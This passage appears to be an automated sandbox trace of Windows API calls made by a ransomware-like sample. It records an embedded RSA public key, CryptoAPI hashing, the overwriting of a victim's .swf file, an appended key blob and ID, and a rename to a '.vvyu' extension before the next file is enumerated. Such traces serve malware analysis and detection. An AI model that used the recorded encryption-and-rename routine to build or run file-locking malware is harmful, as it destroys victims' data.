KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.312] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.312] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b8e8) returned 1 [0198.313] CryptCreateHash (in: hProv=0x31b8e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0198.313] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0198.313] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0198.313] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0198.314] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0198.314] GetLastError () returned 0x0 [0198.314] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0198.314] CryptReleaseContext (hProv=0x31b8e8, dwFlags=0x0) returned 1 [0198.314] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0198.314] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0198.314] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0198.314] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0198.314] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0198.314] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0198.314] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0198.314] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7300) returned 0x2af7168 [0198.315] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0198.315] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0198.315] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0198.315] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0198.315] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2af3f88 [0198.315] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0198.316] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aeab18 [0198.316] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6890 [0198.316] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aeab60 [0198.316] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae68a8 [0198.316] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae68d8 [0198.316] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6938 [0198.316] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae68f0 [0198.316] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0198.316] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0198.316] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0198.316] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af4180 [0198.316] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68d8 | out: hHeap=0x2c0000) returned 1 [0198.316] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68f0 | out: hHeap=0x2c0000) returned 1 [0198.316] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6938 | out: hHeap=0x2c0000) returned 1 [0198.317] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0198.317] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0198.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6938 [0198.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0198.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae68f0 [0198.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0198.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae68d8 [0198.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0198.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0198.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0198.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0198.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0198.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0198.318] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0198.318] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0198.318] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0198.318] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68f0 | out: hHeap=0x2c0000) returned 1 [0198.318] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0198.318] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68d8 | out: hHeap=0x2c0000) returned 1 [0198.318] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0198.318] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0198.318] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6938 | out: hHeap=0x2c0000) returned 1 [0198.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0198.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0198.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0198.319] GetCurrentThreadId () returned 0x5d8 [0198.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0198.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2af5210 [0198.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42548 [0198.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b8e8 [0198.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0198.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0198.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0198.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0198.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.320] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.320] GetCurrentThreadId () returned 0x5d8 [0198.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.321] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0198.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.321] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.321] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.321] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0198.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0198.321] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0198.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0198.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0198.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0198.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0198.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6938 [0198.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0198.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0198.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0198.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0198.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0198.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0198.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0198.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0198.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae68d8 [0198.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0198.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0198.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0198.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0198.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0198.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0198.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0198.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae68f0 [0198.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0198.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0198.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0198.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae68c0 [0198.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0198.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6950 [0198.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0198.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0198.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0198.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6920 [0198.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0198.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6908 [0198.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0198.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6968 [0198.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6908 | out: hHeap=0x2c0000) returned 1 [0198.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6908 [0198.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6920 | out: hHeap=0x2c0000) returned 1 [0198.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0198.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0198.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0198.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0198.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0198.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68d8 | out: hHeap=0x2c0000) returned 1 [0198.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae68d8 [0198.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0198.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af4180 [0198.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6938 | out: hHeap=0x2c0000) returned 1 [0198.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0198.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6968 | out: hHeap=0x2c0000) returned 1 [0198.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4390 [0198.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0198.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0198.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0198.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0198.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68d8 | out: hHeap=0x2c0000) returned 1 [0198.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af45a8 [0198.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0198.325] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0198.325] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0198.325] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b8e8 | out: hHeap=0x2c0000) returned 1 [0198.325] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0198.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0198.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0198.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0198.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4390 | out: hHeap=0x2c0000) returned 1 [0198.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af45a8 | out: hHeap=0x2c0000) returned 1 [0198.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0198.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0198.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6908 | out: hHeap=0x2c0000) returned 1 [0198.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0198.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6950 | out: hHeap=0x2c0000) returned 1 [0198.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0198.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68f0 | out: hHeap=0x2c0000) returned 1 [0198.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68c0 | out: hHeap=0x2c0000) returned 1 [0198.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0198.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0198.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0198.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68a8 | out: hHeap=0x2c0000) returned 1 [0198.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeab60 | out: hHeap=0x2c0000) returned 1 [0198.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0198.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0198.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0198.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0198.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0198.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0198.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0198.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0198.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0198.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0198.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0198.333] WriteFile (in: hFile=0x584, lpBuffer=0x2af7168*, nNumberOfBytesToWrite=0x72fb, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af7168*, lpNumberOfBytesWritten=0x2f9fb14*=0x72fb, lpOverlapped=0x0) returned 1 [0198.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af7168 | out: hHeap=0x2c0000) returned 1 [0198.335] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x7300, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.335] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0198.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0198.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2efb0 [0198.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0198.336] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0198.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0198.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0198.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2efb0 | out: hHeap=0x2c0000) returned 1 [0198.337] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0198.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0198.337] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0198.337] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0198.337] CloseHandle (hObject=0x584) returned 1 [0198.339] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0198.339] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8a0) returned 0x2af3f88 [0198.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0198.339] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\M fZX23r02sYWxh\\0yOYfg2VyeKk-r.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\fpzctgqi5ys\\m fzx23r02sywxh\\0yoyfg2vyekk-r.swf"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\M fZX23r02sYWxh\\0yOYfg2VyeKk-r.swf.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\fpzctgqi5ys\\m fzx23r02sywxh\\0yoyfg2vyekk-r.swf.vvyu")) returned 1 [0198.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0198.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0198.343] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29edcf8 | out: hHeap=0x2c0000) returned 1 [0198.346] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x809ac080, ftCreationTime.dwHighDateTime=0x1d8a5ec, ftLastAccessTime.dwLowDateTime=0x3dbaf180, ftLastAccessTime.dwHighDateTime=0x1d8a5f2, ftLastWriteTime.dwLowDateTime=0x3dbaf180, ftLastWriteTime.dwHighDateTime=0x1d8a5f2, nFileSizeHigh=0x0, nFileSizeLow=0x9a17, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BTrak.swf", cAlternateFileName="")) returned 1 [0198.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa6) returned 0x29edcf8 [0198.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.347] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\M fZX23r02sYWxh\\BTrak.swf") returned=".swf" [0198.347] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\M 